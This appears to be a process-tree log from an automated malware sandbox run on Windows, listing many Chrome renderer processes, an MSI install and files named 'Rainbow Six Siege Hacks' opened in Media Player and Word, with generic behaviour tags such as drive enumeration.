C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=3504,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4324 /prefetch:12⤵PID:2972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=6072,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=5512,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6832 /prefetch:12⤵PID:2236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6408,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5536 /prefetch:142⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6900,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7028 /prefetch:142⤵PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6124,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7004 /prefetch:142⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=4312,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:1108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6200,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5848 /prefetch:142⤵PID:3092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=6884,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7116 /prefetch:12⤵PID:5484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6384,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7212 /prefetch:142⤵PID:5952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=6128,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6672 /prefetch:12⤵PID:3728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=4888,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7004 /prefetch:12⤵PID:4032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=5848,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3476 /prefetch:12⤵PID:956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=7404,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7424 /prefetch:12⤵PID:2376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7412,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7584 /prefetch:12⤵PID:5176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6032,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7376 /prefetch:12⤵PID:5268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=7556,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7832 /prefetch:12⤵PID:1456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=7660,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7656 /prefetch:12⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=8068,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8020 /prefetch:12⤵PID:1688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7636,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7864 /prefetch:142⤵
- NTFS ADS
PID:844
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3476
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=7224,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6680 /prefetch:12⤵PID:444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=8020,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8012 /prefetch:12⤵PID:2328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=7528,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7228 /prefetch:12⤵PID:4172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=8212,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=7824 /prefetch:142⤵PID:5896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=8400,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8432 /prefetch:12⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=8540,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8564 /prefetch:142⤵PID:5252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=8624,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8596 /prefetch:12⤵PID:460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=8196,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8108 /prefetch:12⤵PID:1488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=8532,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8228 /prefetch:12⤵PID:1616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=8320,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=8184 /prefetch:12⤵PID:2752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=7584,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3672 /prefetch:12⤵PID:2112
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:1988
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4500
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2296 -
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play "C:\Users\Admin\Downloads\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_0001.jp2"2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:744 -
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon3⤵
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT4⤵
- Enumerates connected drives
PID:5820
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 38043⤵
- Program crash
PID:5384
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
PID:728
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play "C:\Users\Admin\Downloads\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_0001.jp2"1⤵
- System Location Discovery: System Language Discovery
PID:2592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 744 -ip 7441⤵PID:4600
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5752 -
C:\Program Files\Microsoft Office\root\Office16\Winword.exe"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_0001.jp2"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2176
-
-
C:\Program Files\Microsoft Office\root\Office16\Winword.exe"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_jp2\Rainbow Six Siege Hacks_0000.jp2"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2356
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5548 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:2180
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5880
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2708 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd2f4bdcf8,0x7ffd2f4bdd04,0x7ffd2f4bdd102⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1936,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=1932 /prefetch:22⤵PID:1056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2164,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=2208 /prefetch:112⤵PID:4244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=2296 /prefetch:132⤵PID:2072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:1040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=3408 /prefetch:12⤵PID:5528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4416,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=4372 /prefetch:142⤵PID:5396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4384,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=4608 /prefetch:12⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4420,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=4624 /prefetch:142⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5124,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5136 /prefetch:142⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5364 /prefetch:142⤵PID:5796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5464,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5420 /prefetch:12⤵PID:1108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3400,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=3520 /prefetch:12⤵PID:912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5592,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=3512 /prefetch:12⤵PID:6016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5692,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5680 /prefetch:12⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3604,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5824 /prefetch:142⤵PID:1668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5816 /prefetch:142⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=3344 /prefetch:142⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5820,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3596,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5868 /prefetch:122⤵PID:1548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3664,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:2404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6156,i,5043110024267425316,4798850538285231543,262144 --variations-seed-version=20250328-130116.098000 --mojo-platform-channel-handle=6248 /prefetch:12⤵PID:3068
-
-
